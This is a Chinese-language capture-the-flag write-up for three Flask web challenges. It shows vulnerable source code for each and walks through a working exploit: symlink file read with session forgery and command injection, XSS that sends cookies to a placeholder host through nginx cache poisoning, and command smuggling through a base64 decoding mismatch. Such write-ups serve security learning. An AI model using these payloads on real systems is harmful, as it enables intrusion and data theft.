online_unzipper
app.py:
import os
import uuid
from flask import Flask, request, redirect, url_for,send_file,render_template, session, send_from_directory, abort, Response
app = Flask(__name__)
app.secret_key = os.environ.get("FLASK_SECRET_KEY", "test_key")
UPLOAD_FOLDER = os.path.join(os.getcwd(), "uploads")
os.makedirs(UPLOAD_FOLDER, exist_ok=True)
users = {}
@app.route("/")
def index():
if "username" not in session:
return redirect(url_for("login"))
return redirect(url_for("upload"))
@app.route("/register", methods=["GET", "POST"])
def register():
if request.method == "POST":
username = request.form["username"]
password = request.form["password"]
if username in users:
return "用户名已存在"
users[username] = {"password": password, "role": "user"}
return redirect(url_for("login"))
return render_template("register.html")
@app.route("/login", methods=["GET", "POST"])
def login():
if request.method == "POST":
username = request.form["username"]
password = request.form["password"]
if username in users and users[username]["password"] == password:
session["username"] = username
session["role"] = users[username]["role"]
return redirect(url_for("upload"))
else:
return "用户名或密码错误"
return render_template("login.html")
@app.route("/logout")
def logout():
session.clear()
return redirect(url_for("login"))
@app.route("/upload", methods=["GET", "POST"])
def upload():
if "username" not in session:
return redirect(url_for("login"))
if request.method == "POST":
file = request.files["file"]
if not file:
return "未选择文件"
role = session["role"]
if role == "admin":
dirname = request.form.get("dirname") or str(uuid.uuid4())
else:
dirname = str(uuid.uuid4())
target_dir = os.path.join(UPLOAD_FOLDER, dirname)
os.makedirs(target_dir, exist_ok=True)
zip_path = os.path.join(target_dir, "upload.zip")
file.save(zip_path)
try:
os.system(f"unzip -o {zip_path} -d {target_dir}")
except:
return "解压失败,请检查文件格式"
os.remove(zip_path)
return f"解压完成!<br>下载地址: <a href='{url_for('download', folder=dirname)}'>{request.host_url}download/{dirname}</a>"
return render_template("upload.html")
@app.route("/download/<folder>")
def download(folder):
target_dir = os.path.join(UPLOAD_FOLDER, folder)
if not os.path.exists(target_dir):
abort(404)
files = os.listdir(target_dir)
return render_template("download.html", folder=folder, files=files)
@app.route("/download/<folder>/<filename>")
def download_file(folder, filename):
file_path = os.path.join(UPLOAD_FOLDER, folder ,filename)
try:
with open(file_path, 'r') as file:
content = file.read()
return Response(
content,
mimetype="application/octet-stream",
headers={
"Content-Disposition": f"attachment; filename={filename}"
}
)
except FileNotFoundError:
return "File not found", 404
except Exception as e:
return f"Error: {str(e)}", 500
if __name__ == "__main__":
app.run(host="0.0.0.0")
注意到role为admin时,dirname可控,可以实现命令拼接rce,伪造flask-session需要先获取app.secret_key,本题是从环境变量导入的,可以利用软链接获取/proc/self/environ的内容:
FLASK_SECRET_KEY=#mu0cw9F#7bBCoF!
伪造session:
python flask_session_cookie_manager3.py encode -s "#mu0cw9F#7bBCoF!" -t "{'role':'admin','username':'test'}"
session=eyJyb2xlIjoiYWRtaW4iLCJ1c2VybmFtZSI6InRlc3QifQ.aMUi5w.3kOIwdwel1L_sAQZ2loEgjfRIUA
dirname可控实现rce:
dirname=1;cat /flag*.txt > /app/uploads/c048ac00-3ec7-4557-b328-00e50c5ec392/flag.txt
Unfinished
app.py:
from flask import Flask, request, render_template, redirect, url_for, flash, render_template_string, make_response
from flask_login import LoginManager, UserMixin, login_user, logout_user, current_user, login_required
import requests
from markupsafe import escape
from playwright.sync_api import sync_playwright
import os
app = Flask(__name__)
app.config['SECRET_KEY'] = 'your-secret-key-here'
login_manager = LoginManager()
login_manager.init_app(app)
login_manager.login_view = 'login'
class User(UserMixin):
def __init__(self, id, username, password, bio=""):
self.id = id
self.username = username
self.password = password
self.bio = bio
admin_password = os.urandom(12).hex()
USERS_DB = {'admin': User(id=1, username='admin', password=admin_password)}
USER_ID_COUNTER = 1
@login_manager.user_loader
def load_user(user_id):
for user in USERS_DB.values():
if str(user.id) == user_id:
return user
return None
@app.route('/')
def index():
return render_template('index.html')
@app.route('/register', methods=['GET', 'POST'])
def register():
global USER_ID_COUNTER
if request.method == 'POST':
username = request.form['username']
if username in USERS_DB:
flash('Username already exists.')
return redirect(url_for('register'))
USER_ID_COUNTER += 1
new_user = User(
id=USER_ID_COUNTER,
username=username,
password=request.form['password']
)
USERS_DB[username] = new_user
login_user(new_user)
response = make_response(redirect(url_for('index')))
response.set_cookie('ticket', 'your_ticket_value')
return response
return render_template('register.html')
@app.route('/login', methods=['GET', 'POST'])
def login():
if request.method == 'POST':
username = request.form['username']
password = request.form['password']
user = USERS_DB.get(username)
if user and user.password == password:
login_user(user)
return redirect(url_for('index'))
flash('Invalid credentials.')
return render_template('login.html')
@app.route('/logout')
@login_required
def logout():
logout_user()
return redirect(url_for('index'))
@app.route('/profile', methods=['GET', 'POST'])
@login_required
def profile():
if request.method == 'POST':
current_user.bio = request.form['bio']
print(current_user.bio)
return redirect(url_for('index'))
return render_template('profile.html')
@app.route('/ticket', methods=['GET', 'POST'])
def ticket():
if request.method == 'POST':
ticket = request.form['ticket']
response = make_response(redirect(url_for('index')))
response.set_cookie('ticket', ticket)
return response
return render_template('ticket.html')
@app.route("/view", methods=["GET"])
@login_required
def view_user():
"""
# I found a bug in it.
# Until I fix it, I've banned /api/bio/. Have fun :)
"""
username = request.args.get("username",default=current_user.username)
visit_url(f"http://localhost/api/bio/{username}")
template = f"""
{{\% extends "base.html" \%}}
{{\% block title \%}}success{{\% endblock \%}}
{{\% block content \%}}
<h1>bot will visit your bio</h1>
<p style="margin-top: 1.5rem;"><a href="{{ url_for('index') }}">Back to Home</a></p>
{{\% endblock \%}}
"""
return render_template_string(template)
@app.route("/api/bio/<string:username>", methods=["GET"])
@login_required
def get_user_bio(username):
if not current_user.username == username:
return "Unauthorized", 401
user = USERS_DB.get(username)
if not user:
return "User not found.", 404
return user.bio
def visit_url(url):
try:
flag_value = os.environ.get('FLAG', 'flag{fake}')
with sync_playwright() as p:
browser = p.chromium.launch(headless=True, args=["--no-sandbox"])
context = browser.new_context()
context.add_cookies([{
'name': 'flag',
'value': flag_value,
'domain': 'localhost',
'path': '/',
'httponly': True
}])
page = context.new_page()
page.goto("http://localhost/login", timeout=5000)
page.fill("input[name='username']", "admin")
page.fill("input[name='password']", admin_password)
page.click("input[name='submit']")
page.wait_for_timeout(3000)
page.goto(url, timeout=5000)
page.wait_for_timeout(5000)
browser.close()
except Exception as e:
print(f"Bot error: {str(e)}")
if __name__ == "__main__":
app.run(host='0.0.0.0', port=5000)
实现了一个常规的注册登录修改个人信息的功能,个人信息中可以修改两条内容,一个是ticket,另一个是bio,同时提供了bot访问指定用户bio的功能,第一时间想到XSS带出Cookie,将bio改为XSS语句:
<script>fetch('http://ip:port/steal?flag='+document.cookie)</script>
想要实现XSS还需要解决两个问题,第一个问题/api/bio/<string:username>路由要求只能自己访问自己的bio,第二个问题bot设置Cookie的httpOnly属性为True,正常情况下是无法通过javascript脚本来获取Cookie的
nginx.conf:
user www-data;
worker_processes auto;
pid /var/run/nginx.pid;
events {
worker_connections 1024;
}
http {
proxy_cache_path /var/cache/nginx levels=1:2 keys_zone=static_cache:10m max_size=1g inactive=60m;
include /etc/nginx/mime.types;
default_type application/octet-stream;
server {
listen 80 default_server;
server_name _;
location / {
proxy_pass http://127.0.0.1:5000;
}
location /api/bio/ {
return 403;
}
location ~ \.(css|js)$ {
proxy_pass http://127.0.0.1:5000;
proxy_ignore_headers Vary;
proxy_cache static_cache;
proxy_cache_valid 200 10m;
}
}
}
对于第一个问题,在nginx.conf中甚至直接ban了/api/bio/,但是这里有个nginx的配置问题,正则匹配优先级是高于普通前缀匹配的,因此只要设置用户名为.js/.css后缀,这样就能实现访问自己的bio
要想让bot访问恶意用户的bio,还需要利用到nginx中设置的cache,本题是10min的缓存,并且没有明确设置缓存键proxy_cache_key,使用默认缓存键,例如:
$scheme:GET
$proxy_host:example.com
$request_uri:/index.html
通过缓存投毒来绕过current_user.username == username的判断,这样bot就能访问恶意用户的bio,从而解决第一个问题
对于第二个问题,app.py中设置的是httponly,但是正确的设置应该是httpOnly,因此并没有起到预防XSS窃取Cookie的作用
大致的攻击流程:创建.js/.css后缀用户名 -> 设置bio为XSS -> 自己访问恶意bio实现缓存投毒 -> bot访问恶意bio实现XSS窃取Cookie,攻击效果:

参考资料:
https://www.echo.cool/docs/middleware/nginx/nginx-caching-mechanism/nginx-cache-key/
https://playwright.net.cn/python/docs/api/class-browsercontext
ping
app.py:
import base64
import subprocess
import re
import ipaddress
import flask
def run_ping(ip_base64):
try:
decoded_ip = base64.b64decode(ip_base64).decode('utf-8')
if not re.match(r'^\d+\.\d+\.\d+\.\d+$', decoded_ip):
return False
if decoded_ip.count('.') != 3:
return False
if not all(0 <= int(part) < 256 for part in decoded_ip.split('.')):
return False
if not ipaddress.ip_address(decoded_ip):
return False
if len(decoded_ip) > 15:
return False
if not re.match(r'^[A-Za-z0-9+/=]+$', ip_base64):
return False
except Exception as e:
return False
command = f"""echo "ping -c 1 $(echo '{ip_base64}' | base64 -d)" | sh"""
try:
process = subprocess.run(
command,
shell=True,
check=True,
capture_output=True,
text=True
)
return process.stdout
except Exception as e:
return False
app = flask.Flask(__name__)
@app.route('/ping', methods=['POST'])
def ping():
data = flask.request.json
ip_base64 = data.get('ip_base64')
if not ip_base64:
return flask.jsonify({'error': 'no ip'}), 400
result = run_ping(ip_base64)
if result:
return flask.jsonify({'success': True, 'output': result}), 200
else:
return flask.jsonify({'success': False}), 400
@app.route('/')
def index():
return flask.render_template('index.html')
app.run(host='0.0.0.0', port=5000)
实现了ping ip的功能,同时对于python base64解码后的ip有严格的过滤,但是在执行命令时用的是linux的base64实现的解码,二者的实现是有差异的,python不会解析填充符=之后的内容:
import base64
s1 = b"dGVzdA=="
s2 = b"dGVzdA==Y29tbWFuZA=="
print(base64.b64decode(s1)) # b'test'
print(base64.b64decode(s2)) # b'test'
$ echo 'dGVzdA==' | base64 -d
test
$ echo 'dGVzdA==Y29tbWFuZA==' | base64 -d
testcommand
只需要构造一个base64编码后有填充符的ip,后面跟上base64编码的命令就能实现rce:
$ echo -n '8.8.8.8' | base64 | tr -d '\n'; echo -n ';cat /flag' | base64
OC44LjguOA==O2NhdCAvZmxhZw==
payload:
{"ip_base64":"OC44LjguOA==O2NhdCAvZmxhZw=="}
response:
{"output":"PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.\n64 bytes from 8.8.8.8: icmp_seq=1 ttl=128 time=66.5 ms\n\n--- 8.8.8.8 ping statistics ---\n1 packets transmitted, 1 received, 0% packet loss, time 0ms\nrtt min/avg/max/mdev = 66.546/66.546/66.546/0.000 ms\nflag{test}\n","success":true}